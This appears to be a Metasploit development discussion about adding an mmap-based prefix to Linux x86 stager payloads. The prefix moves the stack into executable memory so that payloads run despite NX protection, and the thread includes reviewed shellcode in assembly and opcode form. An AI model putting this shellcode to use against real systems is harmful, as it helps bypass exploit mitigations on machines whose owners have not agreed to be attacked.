Add mmap to linux x86 stager payloads.

[rickyz]

Previously these payloads jumped to a stack address, which would fail on
machines with NX enabled.

The original metasploit bug for this is at:

https://dev.metasploit.com/redmine/issues/3038

The source of the added assembly (which switches the stack to an executable mmaped region) is:

xor %ecx,%ecx
mov $0x20,%ch
mov $0x7,%dl
push $0x22
pop %esi
xor %eax,%eax
mov $0xc0,%al
int $0x80
xchg %eax,%esp
shr %ecx
add %ecx,%esp

[hdm]

Nevermind - I see that this is just a prefix for each payload. Looks good with one exception, it needs to xor edx,edx as well (can't guarantee state)

[hdm]

On further review, it looks like the xor ebx,ebx at the top wasn't moved down to before the push ebx. This probably won't be touched by the mmap call, but in the interest of paranoia, can you refactor this with the following changes:

• Prefix xor edx, edx
• Move the xor ebx, ebx from the original payload to the end of your prefix

This would look something like:

00000000 31D2 xor edx,edx
00000002 31C9 xor ecx,ecx
00000004 B520 mov ch,0x20
00000006 B207 mov dl,0x7
00000008 6A22 push byte +0x22
0000000A 5E pop esi
0000000B 31C0 xor eax,eax
0000000D B0C0 mov al,0xc0
0000000F CD80 int 0x80
00000011 94 xchg eax,esp
00000012 D1E9 shr ecx,1
00000014 01CC add esp,ecx
00000016 31DB xor ebx,ebx